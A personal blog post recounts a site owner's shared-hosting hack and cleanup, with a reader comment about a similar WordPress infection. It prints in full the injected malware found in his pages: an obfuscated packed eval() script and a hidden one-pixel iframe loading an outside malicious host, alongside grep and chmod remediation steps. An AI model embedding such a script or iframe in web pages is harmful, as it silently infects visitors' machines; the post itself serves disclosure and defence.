Yes. It finally happened. After… 6 years? on the web I finally got hacked.
Two domains affected:
http://cmcculloh.com
http://hallelujahbutton.com
(this also of course affected all sub-domains of cmcculloh.com, such as blog.cmcculloh.com).
This morning I went to my site and was told by Chrome that I wasn’t allowed to go in because my site was going to infect my machine with H.I.V. (well, not really, but that’s how it felt).
Here’s the screen I saw:
THE VERY FIRST THING I DID WAS WENT AND CHANGED ALL OF MY PASSWORDS. I even finally got around to creating multiple users and separating all domains/sub-domains into their own user accounts. This way if cmcculloh.com gets cracked again, blog.cmcculloh.com will have less chance of also being compromised.
It took me quite a while to figure out what the culprit was (and I’m still not 100% sure) but then I realized that hallelujahbutton.com is exactly 1 page long it was really easy to find a very likely suspect. This line of code:
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\134\142','g'),k[c]);return p;}('\x56\40\71\75\x55\x20\x54\x28)\73\71\x2EY\50\x39\x2E\130\50)\53\62)\x3BW\50\123.\x4F&\46\151\56u.N\x28\47M\x5C\x52\\c\x3D\47\51\x3D\75-\61\x29\173\x69\x2E\121\x28\'\\\120\134\x34\\\141\x5C\x318\\\x31\67\x5C\61\x36\x5C4\134\162\x5C\70\1341\x62\134\146\134\x62\'\x2B\x30.\x37(0.\x36\50)*\63\53\63\51\53\'\134\142\40h\\\61a\134\x31\x39\134\x31\65\\x\75\x5C\x22\x27\x2B0\x2E\67\x280\x2E\x36\x28\51\523+\x33\51+\47\x5C\42 \x5C\61\61\x5C\145\\10\\Z\134\x6A\\c\x5C\65\\j=\\\42\x5C\61\64\134\"\x5C\61\63\13412\x5C\x44\\\164\x5C5\134f\\\"B\\m\\4\\C\\\112\134n\134I\\o\134\x71\x5C\113\\F\\E\x5Cw\x5C8\x5C\x35\\\x79\\H\134a\x5C\70\x3A\\\x47\x27\530\x2E7\500.\x36\x28\x29*\x33\53\166)+\x27p\x5C\114\x5C\x79\x5C\x41\\\61\x63\134\x31\104\47\x2B\x30\x2E\x37(\x30\x2E6\x28)*\63\53v\x29+\47\\d\x5C\x67\x5C\x22\\1\x43\\\61\105\134f\\\61\x47\x5C\170\\\x38\134\144\72\1341\106\x5C\154\134g\x5C\x31\171\1341\x78\x5C1z\x5C1\102\x5C\61A\134\164.\\\x72\x5C\143\\\x31M\x5C\x6D\56\x31\x50\x5C\x6C\x5C\145\\\x6F\134\x34\134n\134\x31\117\134d\\\x31L\x5C\x31I\x5C\x7A\x5C\61\116\x5Ck\x5C\163\\\61\x4B\x5C\61\112\\\x31\x48\134\61j\\\61\x69\134\61\x6B\\1m\\q\1341l\1345\\1e\134\141\134s\\1\x64\134b\76\134\x31\x66\57\1341\150\134\141\\1\147\x5C\x31\164\x5C\61s\47);i.\165=\x27\x31\165\\\61\x77\x5Cw\\e\x5C\x31v\x5C\153\'+\x30.\67\50\x30.6\50)*\61o\51\53\x27\134\61\x6E\134\61\160\134\65\x5C\147\\\x7A\\\64\134\152\1341\162\134k\47+9.\61\x71\x28)\x7D',62,114,'\115\x61\x74h\174||10\x30\x7C\x78\x36\71|\61\64\65\x7C\x72and\157m|\x66\x6C\157or|\x78\674\174\145xp\x7C\61\64\66|4\x32|\x78\664\174\x316\60\x7C\1706\x44\174\x78\63\x44|1\x370\174\x7C\x64oc\165\x6De\x6Et\x7Cx\67\62\174\67\x35\x7C5\x37|\170\x37\x33\174x6\x45\x7C1\x34\x31\174\174\170\662\1741\644\1741\x343|\1706\103\174c\157\157\153ie|2\x30\60\174\61\x36\x35\x7C\616\64\174x\63\102\x7Cx\x370\x7C16\x34\x6F\160\174\x70\157\174\x787\64\x69\x7C\6171|1\x35\x34\174\x78\66\106|\655\x7C1\x354\145\x7Cx3A\x7C\615\67\x7C\x3163\174\x78\x378\x7C\x5F_u\174in\144\x65\x78\x4F\146\x7C\x63\157\157\153ieE\156a\142\x6Ce\x64|74\174w\162it\145\174\x78\66\104\x74|\x6E\x61vigat\157r|\104a\x74e\x7C\x6E\x65w\x7Cva\x72\174\x69\146\x7C\x67\x65\164\x44\141t\145|\x73\x65\x74D\141t\145\x7C\170\x362\x6F\174\170\x365\174\170\x36\x36\162\141\174\x31\x36\63\164\x7C\170\620\x7C\x360\174\6150\x7C40\167\x7Cx6D\145\1741\66\x32a\174\x786\x37\x7C1\645\x69|\x78\668\1747\x32|\x365\174x30|x\63\x43|\1707\x32a\x7C\61\x351|x\x33\657\x7C\170\633\x7C\1703\65\x7C\x78\63\x38\174\170\x337\174\x37\63\x7C\7199\719\x399|40\174to\x55\124C\x53t\x72\151ng\x7C\x31\64\65\163|\170\63E\174\x31\x35\x35e\x7C\137|x\674\144|\170\x35F|16\63\155\174x\x36\x31\174\6161\174x69\145|\170\66\64\163\174\x78\62\x30\163r\x7Cx\62D\x7C\x78\66\63|\x78\62F\1744\x32\150\x7Cx3\x31\174\x783\x46\174\x7834\x7C67\x7C\x78\x36\70\x70|1\x35\x36|\x786\x31g\x65\174\65\x36\174\165\x73'.split('|'),0,{}))</script>
<iframe src="http://xmtudaac.cz.cc/?go=1" width="1" height="1"></iframe>
(I added a line break for legibility)
EEEEEWWWW!!!!!! I got pwned!!!
Not 100% sure if it is the iframe *and* the script, or just the iframe.
How did I fix it?
ssh’ed into the site and ran this command “grep -ir function\(p,a,c,k,e,d\) *”. Found that it was in 46 files. Downloaded the entire site and then did a global find/replace in Sublime Text (Ctrl + Shift + h) on the entire script (that I pasted above) and replaced it with nothing. Then I did a follow up search on “function(p,a,c,k,e,d)” again to confirm it was cleaned. Then I deleted the contents of my site on the server and re-uploaded everything I wanted up there.
So, how did this happen? Who knows. I definitely wasn’t the only one. I had, within the last week, used a Chrome App called ShiftEdit and given it my ftp credentials, so I initially thought it might have been them somehow. But then I realized that I share my server with at least 100 other sites. Chances are 99% of those people don’t know anything about security, and a good 20 of them probably use “password1″ as their password. If any of those people got hacked, it’s just a small step once you’re on the box to wrangle root access and run a shell script that eats HTML documents and poops them out with your script inside of them (no, I don’t know how to do this, but I could most likely be doing it by the end of the week were I so nefariously inclined. It’s not hard. USE A GOOD PASSWORD and DON’T REUSE IT ACROSS SITES).
So, anywho, I have cleaned my site and submitted my site to Google for verification so that we can get this error page back down. DON’T click the “proceed anyway” link. Because I’m just a guy and I could still be infected and not know it. Always just click the “go back” button. Once Google has OK’d it, the site will become available (as hallelujahbutton.com now has).
THANK YOU GOOGLE!!! YOU’RE AWESOME!!! Except that I *really* wish your error pages were more specific on EXACTLY what the problem was instead of making me hunt and hunt for it.
Also, I’ve deleted hallelujahbutton.com and set the domain name to expire. I completely forgot it existed and am too busy to want to deal with it anymore so, pruned!
About the Author
Also, Dreamhost found the hole (A directory I somehow ridiculously had set to 777 permissions) and recommended I run this script at the root directory level of my site:
find . -perm 777 -type d -print -exec chmod 755 {} \;
This changes any directories having 777 permissions to have 755 permissions.
Oh God…im also faced this issue few moths ago:-( But, i don’t know that, how to solve this issue..so, i deleted all the woedpress files and installed again! but, still the problem existed..So, i contacted my hosting provider.They said me that, the malware is affected to the whole files and the hidden some configuration files.my .htaccess file is completely edited by the hackers! So, hosting provider deleted the account and re created.Then i did a new fresh install.Then all works fine.Now my blog is running with highly protection…I use a very effective plugin for security.Sorry for my language.
akhil.